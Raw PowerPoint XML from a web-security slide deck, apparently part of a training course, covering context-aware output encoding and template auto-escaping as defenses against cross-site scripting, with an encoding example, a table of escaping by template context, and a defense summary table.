                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forHTMLAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>mysite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>editUser.do?userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forUriComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> )) %&gt;"&gt;Please click me!&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150185252"/>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 Template Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>{{.}}   =   O'Reilly: How are &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>&gt;you&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>&gt;?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1149292098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457199" y="2011460"/>
          <a:ext cx="8229601" cy="3411939"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2747850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5481751">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Context                          </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="12700" marR="12700" marT="1270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algn="ctr" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>{{.}} After Modification</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="12700" marR="12700" marT="1270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24899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>{{.}}                            </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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O'Reilly: How are &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>lt;i&amp;gt;you&amp;lt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>i&amp;gt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>;?</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424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>title</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>='{{.}}'&gt;                </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l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O&amp;#39;Reilly: How are you?</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424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a href="/{{.}}"&gt;                </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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O&amp;#39;Reilly: How are %3ci%3eyou%3c/i%3e?</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424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a href="?q={{.}}"&gt;             </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CE9E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O&amp;#39;Reilly%3a%20How%20are%3ci%3e...%3f</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CE9E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="fi-FI" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a onx='f("{{.}}")'&gt;             </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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O\x27Reilly: How are \x3ci\x3eyou...?</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r h="424899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="fi-FI" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fi-FI" sz="1600" b="0" i="0" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>onx='f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fi-FI" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>({{.}})'&gt;               </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CE9E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>"O\x27Reilly: How are \x3ci\x3eyou...?"</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CE9E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="348248">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>&lt;a onx='pattern = /{{.}}/;'&gt;</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l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>O\x27Reilly: How are \x3ci\x3eyou...\x3f</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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62137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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Review: XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>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1924511866"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4228207"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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Defense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HTML Body/Attribute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HTML Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</a:t>
                      </a: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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification</a:t>
                      </a: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CSS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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">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Anywhere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Sanitization (Server and Client Side)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DOM</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Safe use of JS API's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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain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Client Parse Time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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</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Embedded</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r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
